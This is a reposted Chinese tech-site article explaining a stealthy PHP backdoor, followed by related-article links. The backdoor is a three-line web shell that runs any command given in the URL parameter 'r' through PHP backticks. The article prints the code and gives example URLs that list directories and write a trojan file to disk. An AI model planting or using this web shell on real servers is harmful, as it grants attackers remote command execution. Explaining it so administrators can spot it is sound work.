当前位置:  编程技术>php

一个不易被发现的PHP后门代码解析

    来源: 互联网  发布时间:2014-08-26

    本文导语:  偶然间看到一段,看起来似乎没有什么问题,确是能致命的后门代码,这里用到了一个一般的PHPer都不怎么关注的反撇号 ` ,反撇号包含的字符串,等同于shell_exec函数。 伪装性很好,很容易被管理员忽略。 $selfNums = $_GET['r'];...

偶然间看到一段,看起来似乎没有什么问题,确是能致命的后门代码,这里用到了一个一般的PHPer都不怎么关注的反撇号 ` ,反撇号包含的字符串,等同于shell_exec函数。

伪装性很好,很容易被管理员忽略。

$selfNums = $_GET['r'];
if (isset($selfNums)){
  echo `$selfNums`;
}

刚看到这段代码我想大家都会说没有问题,但是细心的朋友也会发现下面的变量被一个符号包起来了,既然是变量为什么要这样了,

而且又不是单引号,这个就是关键所在了,这个符号是 Esc 下面的一个键(位于感叹号!旁边的),

通过 echo `系统命令`; 可以达到 system(); 一样的效果

如果不信的朋友可以测试

http://127.0.0.1/t.php?r=dir 可以列出目录

http://127.0.0.1/t.php?r=echo 我是马儿 >>D:web90sec.php

我用 appserv 和虚拟主机已经测试成功。


    
 
 

您可能感兴趣的文章:

 
本站(WWW.)旨在分享和传播互联网科技相关的资讯和技术,将尽最大努力为读者提供更好的信息聚合和浏览方式。
本站(WWW.)站内文章除注明原创外,均为转载、整理或搜集自网络。欢迎任何形式的转载,转载请注明出处。












  • 相关文章推荐
  • 下了2.4.0的内核, 发现代码没有多少
  • 用gdb查错,发现一个由free引起的段错误,但我的代码(c++)中根本没有用到free啊?
  • 写了段代码,发现个问题,求解释
  • ping发现掉包报警的shell代码
  • 调查发现微信存在漏洞:冒充微信助手骗密码
  • 刚接触linux,发现安装好后通过grep memtotal查询发现比实际物理内存小。
  • 网络发现与配置工具 NeDI
  • netstat发现TIME_WAIT
  • 发现jcertify4.0答案有错误,同意者请举手
  • 蓝牙设备发现工具 Bluelog
  • 如何发现服务具体是哪个进程占用CPU高?
  • 网络设备自动发现工具 Observer
  • 通过JdbcOdbcDriver连接Access出现“未发现数据源名称并且未指定默认驱动程序”
  • 在非GUI程序中,我用JOptionPane.showMessageDialog后,发现程序无法结束。why?
  • 如何查看linux现在有没有发现机器的内猫?
  • 我下载了Fedora3,发现了一个奇怪的问题
  • 写了一个处理大量文本的程序,发现跑一段时间以后大量的吃掉内存。
  • 怎么回事,打开本页,瑞星报告发现病毒!!!
  • ipmsg采用无线点对点的模式,为什么不能发现用户!
  • 发现一个有趣的东西,继续散分。
  • 发现一个Linux牛人的博客
  • 增加 虚拟硬盘 后发现没有起作用
  • top查看CPU 发现top本身占用率奇高
  • 昨天发现fcntl设置非阻塞SOCKET会频繁的失败,不知道什么原因.
  • 发现一个 bug 赏黄金千两!


  • 站内导航:


    特别声明:169IT网站部分信息来自互联网,如果侵犯您的权利,请及时告知,本站将立即删除!

    ©2012-2021,,E-mail:www_#163.com(请将#改为@)

    浙ICP备11055608号-3